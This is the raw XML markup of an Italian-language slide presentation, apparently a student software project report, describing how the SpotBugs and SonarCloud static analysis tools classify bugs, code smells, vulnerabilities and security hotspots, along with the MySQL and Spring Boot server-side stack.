              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{50767A9F-E5D6-D173-2366-16A092F48CEB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="806070" y="3990752"/>
            <a:ext cx="4813322" cy="2483198"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Immagine 9" descr="Immagine che contiene testo, schermata, Carattere, linea&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8AD99B66-C840-65B7-21D3-CF848DAA62A6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4879895" y="5427474"/>
            <a:ext cx="6926164" cy="1046476"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3643297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SpotBugs</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l">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>I</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>n </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>SpotBugs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> ogni bug individuato viene classificato con un livello di severità. Questo livello di severità indica l'importanza del bug e la sua potenziale influenza sul funzionamento del software.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>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7" name="Immagine 6" descr="Immagine che contiene testo, schermata, design&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C0732BDF-26BE-12AF-B4F5-CAE7A51A2E4D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3211235" y="3140362"/>
            <a:ext cx="5769529" cy="3168998"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4227678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SpotBugs</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l">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Si è provveduto alla correzione dei bug rilevato e mandato di nuovo in esecuzione </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0" err="1">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>SpotBugs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>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 software, Carattere&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E8438F4-A891-850A-32A7-20E167FDF4FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2063407" y="3093651"/>
            <a:ext cx="7772400" cy="2965653"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3183740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SonarCloud</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err="1">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>SonarCloud</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> è una piattaforma di analisi statica del codice basata su cloud fornita da </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>SonarSource</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:br>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>È uno </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>strumento di analisi statica del codice che permette di valutare la qualità del codice sorgente, individuare potenziali problemi e vulnerabilità.</a:t>
            </a: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
        <p:nvSpPr>
          <p:cNvPr id="8" name="CasellaDiTesto 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE58FBBB-F4EB-11F0-976A-E7B91FC3F859}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1115568" y="3947657"/>
            <a:ext cx="4977814" cy="1323439"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>I </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>findings</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> rappresentano problemi, come vulnerabilità di sicurezza, errori di codifica, violazioni delle best </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>practice</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> di programmazione, cattive prestazioni o altre debolezze/errori rilevati durante l’analisi statica e segnalati da </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>SornarCloud</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1600" dirty="0">
              <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Immagine 9" descr="Immagine che contiene testo, schermata, Carattere, linea&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A44E421-2637-42BA-C8A4-436A59E764E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect b="31822"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6093382" y="3947657"/>
            <a:ext cx="5973027" cy="1516657"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1074995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SonarCloud</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rPr>
              <a:t>I code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>smell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>vengono classificati in base al loro livello di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0" err="1">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>severity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> e includono</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Duplicazione nel codice</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Complessità eccessiva di classi e metodi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Lunghezza eccessiva di classi e metodi</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1600" dirty="0">
              <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Dipendenza ciclica tra classi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Classi con troppe responsabilità</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Classi con bassa coesione</a:t>
            </a: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schermata, testo, software&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{922761B2-3F4A-C502-166A-A9F53B448E82}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5264126" y="3319670"/>
            <a:ext cx="6433888" cy="3232528"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="252380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Tecnologie utilizzate: server side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1" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>MySQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>: MySQL è un sistema di gestione di database relazionale che viene utilizzato per archiviare e gestire i dati nel lato server. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="1" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Spring Boot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>: Spring Boot è un framework Java per lo sviluppo di applicazioni web lato server. Fornisce un'infrastruttura preconfigurata per semplificare lo sviluppo di applicazioni Spring e integra funzionalità come la gestione delle richieste HTTP, la configurazione del database e molto altro.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Queste tecnologie consentono </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>di creare applicazioni web complete, in cui il server side si occupa della logica di business, dell'elaborazione dei dati e della comunicazione con il database</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1600" dirty="0">
              <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4115446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SonarCloud</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err="1">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>SonarCloud</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> riesce a rilevare anche le vulnerabilità del codice, che potrebbero essere sfruttate da un attaccante. Anche queste sono classificati in base a un livello di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0" err="1">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>severity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a: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9" name="Immagine 8" descr="Immagine che contiene testo, schermata&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03AC25E6-82E2-DD2F-7F25-43418918F5FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1115568" y="3319670"/>
            <a:ext cx="5474043" cy="2340794"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Immagine 10" descr="Immagine che contiene testo, schermata, Carattere&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF89A314-C6D8-5450-FC36-0ABF18EAF773}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6642390" y="4325112"/>
            <a:ext cx="4981008" cy="1947425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1232952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SonarCloud</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b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>I security hotspot segnalano il codice sensibile alla sicurezza che richiede una revisione manuale per valutare se esiste o meno una vulnerabilità.</a:t>
            </a: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10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{38DB6DF9-E850-8FAD-4769-02F1F04420B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="960698" y="3169085"/>
            <a:ext cx="4734046" cy="2312053"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Immagine 12" descr="Immagine che contiene testo, schermata, Carattere, algebra&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{541A334B-BDF7-B282-0F9B-79639780A3F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5849614" y="3169085"/>
            <a:ext cx="3966693" cy="1268561"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="Immagine 14" descr="Immagine che contiene testo, schermata, Carattere, documento&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C6CE343A-65B7-C558-4F87-8B85D90F4319}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4556567" y="5187752"/>
            <a:ext cx="3078866" cy="1124390"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="Immagine 16" descr="Immagine che contiene testo, schermata, Carattere, algebra&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E617B5EA-5897-B5C0-C90B-446217C6A9B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7953019" y="4402071"/>
            <a:ext cx="3744995" cy="902852"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="Immagine 18" descr="Immagine che contiene testo, schermata, Carattere, ricevuta&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ECFAE74D-34B4-30BD-5ED2-C3D13B31566A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7918486" y="5304923"/>
            <a:ext cx="3771526" cy="1250905"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3358218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SonarCloud</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>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14" name="Immagine 13" descr="Immagine che contiene testo, schermata&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD922A13-18CE-C665-C759-200ABE2DEC76}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1165303" y="2298052"/>
            <a:ext cx="4822146" cy="2399360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
